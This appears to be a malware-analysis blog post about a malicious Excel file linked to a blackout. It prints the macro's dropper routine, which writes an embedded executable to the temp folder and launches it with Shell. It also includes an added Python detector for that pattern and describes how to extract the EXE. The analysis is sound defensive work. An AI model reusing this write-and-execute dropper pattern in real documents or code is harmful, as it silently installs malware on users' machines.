The full intrusion chain, and how the malware was related to the blackout, is not yet clear.
(See Robert M. Lee's tweets: https://twitter.com/RobertMLee/status/685030648587812864 https://twitter.com/RobertMLee/status/685031160901074944)
However, it looks like an MS Office XLS document was involved or was somehow related.
I got a sample of the file, and in order to perform the analysis I followed an approach similar to the one in a post I wrote some days ago:
Using Remnux v6, check the content of the file with oletools:
I dump the macro to a temporary file:
There are several encoded subroutines, but the important part for me, in order to get the EXE, is the final part of the code. I can see that an executable file is created and then executed through the 'Shell' instruction:
Private Sub MacroExpl()
    Dim fnum As Integer
    Dim fname As String
    Dim i As Integer
    Dim j As Integer
    Dim aa As Byte
    fnum = FreeFile
    ' Dropped payload path: %TMP%\vba_macro.exe
    fname = Environ("TMP") & "\vba_macro.exe"
    Open fname For Binary As #fnum
    ' 768 x 128 bytes are written, one at a time, from the encoded arrays a(i)(j)
    For i = 1 To 768
        For j = 0 To 127
            aa = a(i)(j)
            Put #fnum, , aa
        Next j
    Next i
    Close #fnum
    ' The dropped file is then executed
    rss = Shell(fname, 1)
End Sub

Private Sub Workbook_Activate()
    ' Body not included in the part of the dump shown here
End Sub
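A static check for the write-then-Shell pattern described above, added here as an example (not code from the original post): it scans an olevba dump for a binary file write whose path variable is later handed to Shell, and derives from the loop bounds how many bytes the dropper would write. The sample text is the dropper routine from this post, embedded for the example; the regular expressions and the function name are my own.

```python
import re

# Constructed sample: the dropper routine as it appeared in the olevba dump
# (the encoded byte arrays feeding a(i)(j) are not part of this sample).
SAMPLE_VBA = """
Private Sub MacroExpl()
    Dim fnum As Integer
    Dim fname As String
    fnum = FreeFile
    fname = Environ("TMP") & "\\vba_macro.exe"
    Open fname For Binary As #fnum
    For i = 1 To 768
        For j = 0 To 127
            aa = a(i)(j)
            Put #fnum, , aa
        Next j
    Next i
    Close #fnum
    rss = Shell(fname, 1)
End Sub
"""


def analyse_dropper(vba: str) -> dict:
    """Flag the write-bytes-then-execute pattern in VBA source.

    Returns the variable holding the dropped path, the expression assigned
    to it, whether Put # writes are present, whether that same variable is
    passed to Shell, and the byte count the nested For loops would write
    (each Put of a Byte variable writes exactly one byte)."""
    open_m = re.search(r'Open\s+(\w+)\s+For\s+Binary', vba, re.I)
    path_var = open_m.group(1) if open_m else None
    path_m = (re.search(rf'{re.escape(path_var)}\s*=\s*(.+)', vba)
              if path_var else None)
    shell_m = re.search(r'Shell\s*\(\s*(\w+)', vba, re.I)
    loops = re.findall(r'For\s+\w+\s*=\s*(\d+)\s+To\s+(\d+)', vba, re.I)
    has_put = re.search(r'\bPut\s+#', vba, re.I) is not None
    size = 1
    for lo, hi in loops:
        size *= int(hi) - int(lo) + 1
    return {
        "path_var": path_var,
        "path_expr": path_m.group(1).strip() if path_m else None,
        "writes_bytes": has_put,
        "executes_written_file": bool(shell_m and path_var
                                      and shell_m.group(1) == path_var),
        "expected_size": size if (loops and has_put) else 0,
    }
```

On the sample above the loop bounds give 768 x 128 = 98304 bytes, which is the size to expect for the dropped vba_macro.exe before any dynamic step is taken.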
The next step is to dump the EXE file. For that I will first try to open the original malicious XLS in the MS Office debugger, in order to put a breakpoint in that function before it is executed.
However, the macro is password protected:
But as I already have the macro dumped in Remnux, I can create my own XLS document and import that macro. So I do that:
Now I set up the breakpoint on the 'Shell' command, and I can see where the executable file is stored before it is executed:
With this I have the executable :)
In future posts I will explain the approach to analysing the EXE file.